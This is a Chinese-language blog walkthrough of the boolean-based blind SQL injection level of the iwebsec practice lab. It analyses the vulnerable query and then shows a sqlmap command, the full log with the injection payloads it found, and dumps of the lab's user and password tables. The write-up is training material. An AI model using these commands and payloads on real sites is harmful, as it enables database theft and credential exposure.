系列文章目錄
iwebsec靶場 SQL注入漏洞通關筆記1- 數字型注入_mooyuan的部落格-CSDN部落格
iwebsec靶場 SQL注入漏洞通關筆記2- 字元型注入(寬位元組注入)_mooyuan的部落格-CSDN部落格
目錄
文章目錄
前言
一、源碼分析
二、sqlmap滲透
1.注入指令
2.完整互動過程
總結
前言
iwebsec靶場的SQL注入漏洞的第03關bool注入漏洞滲透,
一、源碼分析
如下所示,SQL語句為$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";
可知這是一個普通的數字型注入,并且沒有對參數id做任何過濾
不過在輸出内容中可以得知僅sql查詢成功時有正确輸出welcome to iwebsec!!!
當sql查詢結果錯誤時顯示1
也就是說這屬于布爾型注入,形象的描述就是目前頁面隻會點頭或者搖頭,僅有這兩種表達方式,也就是布爾的是與否兩者形式,故而是布爾注入。
二、sqlmap滲透
1.注入指令
sqlmap -u http://192.168.71.151/sqli/01.php?id=1 --current-db --dump --batch
如下所示滲透成功,發現其存在布爾型盲注漏洞
2.完整互動過程
[email protected]:~$ sqlmap -u http://192.168.71.151/sqli/03.php?id=1 --current-db --dump --batch
___
__H__
___ ___[']_____ ___ ___ {1.5.11#stable}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:18:11 /2022-11-24/
[22:18:11] [INFO] testing connection to the target URL
[22:18:11] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:18:11] [INFO] testing if the target URL content is stable
[22:18:11] [INFO] target URL content is stable
[22:18:11] [INFO] testing if GET parameter 'id' is dynamic
[22:18:11] [WARNING] GET parameter 'id' does not appear to be dynamic
[22:18:11] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[22:18:11] [INFO] testing for SQL injection on GET parameter 'id'
[22:18:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:18:12] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="welcome to iwebsec!!!")
[22:18:12] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[22:18:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[22:18:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[22:18:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[22:18:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[22:18:12] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[22:18:12] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[22:18:12] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[22:18:12] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[22:18:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:18:12] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:18:12] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:18:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:18:12] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[22:18:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[22:18:12] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:18:12] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[22:18:12] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[22:18:12] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[22:18:12] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[22:18:12] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[22:18:12] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[22:18:12] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[22:18:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[22:18:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[22:18:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[22:18:12] [INFO] testing 'Generic inline queries'
[22:18:12] [INFO] testing 'MySQL inline queries'
[22:18:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[22:18:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[22:18:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[22:18:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[22:18:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[22:18:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[22:18:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:18:22] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[22:18:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:18:22] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:18:22] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:18:22] [INFO] target URL appears to have 3 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[22:18:22] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[22:18:22] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[22:18:22] [INFO] testing 'MySQL UNION query (29) - 1 to 20 columns'
[22:18:22] [INFO] testing 'MySQL UNION query (29) - 21 to 40 columns'
[22:18:23] [INFO] testing 'MySQL UNION query (29) - 41 to 60 columns'
[22:18:23] [INFO] testing 'MySQL UNION query (29) - 61 to 80 columns'
[22:18:23] [INFO] testing 'MySQL UNION query (29) - 81 to 100 columns'
[22:18:23] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 255 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 6892=6892
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 2146 FROM (SELECT(SLEEP(5)))rHLa)
---
[22:18:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[22:18:23] [INFO] fetching current database
[22:18:23] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:18:23] [INFO] retrieved: iwebsec
current database: 'iwebsec'
[22:18:23] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[22:18:23] [INFO] fetching current database
[22:18:23] [INFO] fetching tables for database: 'iwebsec'
[22:18:23] [INFO] fetching number of tables for database 'iwebsec'
[22:18:23] [INFO] retrieved: 4
[22:18:23] [INFO] retrieved: sqli
[22:18:23] [INFO] retrieved: user
[22:18:23] [INFO] retrieved: users
[22:18:24] [INFO] retrieved: xss
[22:18:24] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[22:18:24] [INFO] retrieved: 4
[22:18:24] [INFO] retrieved: id
[22:18:24] [INFO] retrieved: username
[22:18:24] [INFO] retrieved: password
[22:18:24] [INFO] retrieved: email
[22:18:24] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
[22:18:24] [INFO] fetching number of entries for table 'sqli' in database 'iwebsec'
[22:18:24] [INFO] retrieved: 7
[22:18:24] [INFO] retrieved: [email protected]
[22:18:25] [INFO] retrieved: 1
[22:18:25] [INFO] retrieved: pass1
[22:18:25] [INFO] retrieved: user1
[22:18:25] [INFO] retrieved: [email protected]
[22:18:26] [INFO] retrieved: 2
[22:18:26] [INFO] retrieved: pass2
[22:18:26] [INFO] retrieved: user2
[22:18:26] [INFO] retrieved: [email protected]
[22:18:27] [INFO] retrieved: 3
[22:18:27] [INFO] retrieved: pass3
[22:18:27] [INFO] retrieved: user3
[22:18:27] [INFO] retrieved: [email protected]
[22:18:28] [INFO] retrieved: 4
[22:18:28] [INFO] retrieved: admin
[22:18:28] [INFO] retrieved: admin
[22:18:28] [INFO] retrieved: [email protected]
[22:18:28] [INFO] retrieved: 5
[22:18:28] [INFO] retrieved: 123
[22:18:29] [INFO] retrieved: 123
[22:18:29] [INFO] retrieved: [email protected]
[22:18:29] [INFO] retrieved: 6
[22:18:29] [INFO] retrieved: 123
[22:18:29] [INFO] retrieved: ctfs' or updatexml(1,concat(0x7e,(version())),0)#
[22:18:31] [INFO] retrieved: [email protected]
[22:18:32] [INFO] retrieved: 7
[22:18:32] [INFO] retrieved: 123456
[22:18:32] [INFO] retrieved: iwebsec' or updatexml(1,concat(0x7e,(version())),0)#
Database: iwebsec
Table: sqli
[7 entries]
+----+-----------------------+----------+------------------------------------------------------+
| id | email | password | username |
+----+-----------------------+----------+------------------------------------------------------+
| 1 | [email protected] | pass1 | user1 |
| 2 | [email protected] | pass2 | user2 |
| 3 | [email protected] | pass3 | user3 |
| 4 | [email protected] | admin | admin |
| 5 | [email protected] | 123 | 123 |
| 6 | [email protected] | 123 | ctfs' or updatexml(1,concat(0x7e,(version())),0)# |
| 7 | [email protected] | 123456 | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# |
+----+-----------------------+----------+------------------------------------------------------+
[22:18:33] [INFO] table 'iwebsec.sqli' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/sqli.csv'
[22:18:33] [INFO] fetching columns for table 'user' in database 'iwebsec'
[22:18:33] [INFO] retrieved: 3
[22:18:34] [INFO] retrieved: id
[22:18:34] [INFO] retrieved: username
[22:18:34] [INFO] retrieved: password
[22:18:34] [INFO] fetching entries for table 'user' in database 'iwebsec'
[22:18:34] [INFO] fetching number of entries for table 'user' in database 'iwebsec'
[22:18:34] [INFO] retrieved: 3
[22:18:34] [INFO] retrieved: 1
[22:18:34] [INFO] retrieved: pass1
[22:18:35] [INFO] retrieved: user1
[22:18:35] [INFO] retrieved: 2
[22:18:35] [INFO] retrieved: pass2
[22:18:35] [INFO] retrieved: user2
[22:18:35] [INFO] retrieved: 3
[22:18:35] [INFO] retrieved: pass3
[22:18:35] [INFO] retrieved: user3
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1 | pass1 | user1 |
| 2 | pass2 | user2 |
| 3 | pass3 | user3 |
+----+----------+----------+
[22:18:36] [INFO] table 'iwebsec.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/user.csv'
[22:18:36] [INFO] fetching columns for table 'xss' in database 'iwebsec'
[22:18:36] [INFO] retrieved: 2
[22:18:36] [INFO] retrieved: id
[22:18:36] [INFO] retrieved: name
[22:18:36] [INFO] fetching entries for table 'xss' in database 'iwebsec'
[22:18:36] [INFO] fetching number of entries for table 'xss' in database 'iwebsec'
[22:18:36] [INFO] retrieved: 5
[22:18:36] [INFO] retrieved: 1
[22:18:36] [INFO] retrieved: iwebsec
[22:18:36] [INFO] retrieved: 5
[22:18:36] [INFO] retrieved: <img src=1 onerror=alert(/ctfs/)/>
[22:18:38] [INFO] retrieved: 6
[22:18:38] [INFO] retrieved: <img src=1 onerror=alert(/ctfs/)/>
[22:18:39] [INFO] retrieved: 7
[22:18:39] [INFO] retrieved: <img src=1 onerror=alert(/ctfs/)/>
[22:18:40] [INFO] retrieved: 8
[22:18:40] [INFO] retrieved: <?php phpinfo();?>
Database: iwebsec
Table: xss
[5 entries]
+----+------------------------------------+
| id | name |
+----+------------------------------------+
| 1 | iwebsec |
| 5 | <img src=1 onerror=alert(/ctfs/)/> |
| 6 | <img src=1 onerror=alert(/ctfs/)/> |
| 7 | <img src=1 onerror=alert(/ctfs/)/> |
| 8 | <?php phpinfo();?> |
+----+------------------------------------+
[22:18:41] [INFO] table 'iwebsec.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/xss.csv'
[22:18:41] [INFO] fetching columns for table 'users' in database 'iwebsec'
[22:18:41] [INFO] retrieved: 3
[22:18:41] [INFO] retrieved: username
[22:18:42] [INFO] retrieved: password
[22:18:42] [INFO] retrieved: role
[22:18:42] [INFO] fetching entries for table 'users' in database 'iwebsec'
[22:18:42] [INFO] fetching number of entries for table 'users' in database 'iwebsec'
[22:18:42] [INFO] retrieved: 1
[22:18:42] [INFO] retrieved: mall123mall
[22:18:43] [INFO] retrieved: admin
[22:18:43] [INFO] retrieved: orange
Database: iwebsec
Table: users
[1 entry]
+-------+-------------+----------+
| role | password | username |
+-------+-------------+----------+
| admin | mall123mall | orange |
+-------+-------------+----------+
[22:18:44] [INFO] table 'iwebsec.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/users.csv'
[22:18:44] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.151'
[22:18:44] [WARNING] your sqlmap version is outdated
[*] ending @ 22:18:44 /2022-11-24/
總結
通過源碼再來分析下布爾型SQL注入重點内容:
(1)閉合方式是什麼?iwebsec的第03關關卡為數字型
(2)注入類别是什麼?這部分通過源碼分析與手注很容易判斷出是布爾型注入
(3)是否過濾了關鍵字?很明顯通過源碼,iwebsec的布爾型關卡無過濾任何資訊
了解了如上資訊就可以針對性進行SQL滲透,使用sqlmap工具滲透更是事半功倍,以上就是今天要講的第3關bool注入内容,初學者建議按部就班先使用手動注入練習,再進行sqlmap滲透。